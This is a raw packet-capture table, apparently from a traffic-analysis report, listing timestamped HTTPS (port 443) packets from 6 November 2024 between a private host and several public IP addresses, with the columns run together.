                                                                                                                                                                                                            Nov 6, 2024 06:29:49.394562960 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.394572020 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.394813061 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.395924091 CET57757443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.395936966 CET44357757162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.396302938 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.396317959 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.396895885 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.396898031 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.396905899 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.396908045 CET44357754162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.397604942 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.397617102 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.403270006 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.403295994 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.403353930 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.403366089 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.403436899 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.446885109 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.446942091 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.447029114 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.447036028 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.447215080 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.447246075 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.447305918 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.447316885 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.447434902 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.475991011 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.475999117 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.476138115 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.476233006 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.476239920 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.476344109 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.476350069 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.477699995 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.477845907 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.477852106 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.477963924 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.489605904 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.492285967 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.492769957 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.492778063 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.518893957 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.518901110 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.519058943 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.535943985 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.565346956 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.565375090 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.565397978 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.565648079 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.565709114 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.565726995 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.565737009 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.565884113 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.591424942 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.591510057 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.592008114 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.592129946 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.593205929 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.593322039 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.610657930 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.610666990 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.610738039 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.610788107 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.611016035 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.634506941 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.634932041 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.643877029 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.644383907 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.644392014 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.644670963 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.645380020 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.645432949 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.645596981 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.684043884 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.684107065 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.684133053 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.684154034 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.684165001 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.684267998 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.687330008 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.701351881 CET4435774713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.701905012 CET57747443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.701921940 CET4435774713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.702306032 CET57747443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.702310085 CET4435774713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.707082033 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.707267046 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.707293987 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.707304955 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.707334042 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.707542896 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.708771944 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.708971024 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.711568117 CET4435775013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.712342978 CET57750443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.712372065 CET4435775013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.712414980 CET4435774913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.712901115 CET57750443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.712918043 CET4435775013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.713531971 CET57749443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.713532925 CET57749443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.713571072 CET4435774913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.713583946 CET4435774913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.715512991 CET4435774813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.716197014 CET57748443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.716197014 CET57748443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.716212034 CET4435774813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.716217041 CET4435774813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.727008104 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.727251053 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.729433060 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.729507923 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.750226974 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.750268936 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.750309944 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.750320911 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.750345945 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.750366926 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.750473022 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.753690958 CET57744443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.753706932 CET44357744104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.755343914 CET4435775113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.756531954 CET57751443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.756551981 CET4435775113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.756925106 CET57751443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.756930113 CET4435775113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.763989925 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.764028072 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.764134884 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.764365911 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.764375925 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.794447899 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.794495106 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.794534922 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.794569016 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.794692993 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.794703007 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.794715881 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.795046091 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.795078993 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.795106888 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.795106888 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.795116901 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.795166016 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.795166016 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.802390099 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.802479029 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.802917004 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.803006887 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.830432892 CET4435774713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.830496073 CET4435774713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.830724955 CET57747443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.830724955 CET57747443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.830759048 CET57747443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.830771923 CET4435774713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.835867882 CET57765443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.835906029 CET4435776513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.836175919 CET57765443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.836421013 CET57765443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.836433887 CET4435776513.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.838629007 CET4435775013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.839070082 CET4435775013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.839162111 CET57750443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.839162111 CET57750443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.839385033 CET57750443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.839402914 CET4435775013.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.841209888 CET57766443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.841257095 CET4435776613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.841419935 CET57766443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.841487885 CET57766443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.841500998 CET4435776613.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.841779947 CET4435774913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.842087984 CET4435774913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.842168093 CET57749443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.842168093 CET57749443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.842413902 CET57749443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.842422009 CET4435774913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.844014883 CET57767443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.844031096 CET4435776713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.844185114 CET57767443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.844254971 CET57767443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.844264984 CET4435776713.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.845314026 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.845418930 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.847618103 CET4435774813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.847716093 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.847830057 CET4435774813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.847842932 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.847978115 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.848005056 CET57748443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.848109007 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.848125935 CET57748443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.848125935 CET57748443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.848135948 CET4435774813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.848144054 CET4435774813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.850446939 CET57768443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.850482941 CET4435776813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.850548029 CET57768443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.850667953 CET57768443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.850678921 CET4435776813.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.884506941 CET4435775113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.884680033 CET4435775113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.886009932 CET57751443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.886009932 CET57751443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.886287928 CET57751443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.886306047 CET4435775113.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.888366938 CET57769443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.888402939 CET4435776913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.888498068 CET57769443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.889904022 CET57769443192.168.2.413.107.246.45
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.889916897 CET4435776913.107.246.45192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.911205053 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.911408901 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.911436081 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.911465883 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.911560059 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.911571980 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.912133932 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.912168026 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.912353992 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.912360907 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.912431002 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.912482977 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.922182083 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.922265053 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.922291994 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.922313929 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.922338009 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.922542095 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.957273960 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.957298040 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.966341019 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.966567039 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.966594934 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.966610909 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.966638088 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.966789961 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.967061996 CET44357746172.66.0.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.967164040 CET57746443192.168.2.4172.66.0.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.992743969 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.992964029 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.992973089 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.993254900 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.993685961 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.993685961 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.993699074 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.993738890 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.000215054 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.000453949 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.000478983 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.001425028 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.001538038 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.001890898 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.001961946 CET44357756162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.002058029 CET57756443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.002429008 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.002652884 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.002660990 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.002801895 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.002979994 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.002988100 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.003549099 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.003762007 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.003968000 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.004017115 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.004380941 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.004441023 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.004728079 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.004729033 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.005026102 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.005100965 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.005218983 CET57755443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.005243063 CET44357755162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.005801916 CET44357754162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.006068945 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.006091118 CET44357754162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.007196903 CET44357754162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.007426977 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.007698059 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.007698059 CET57754443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.007710934 CET44357754162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.007750988 CET44357754162.159.140.34192.168.2.4
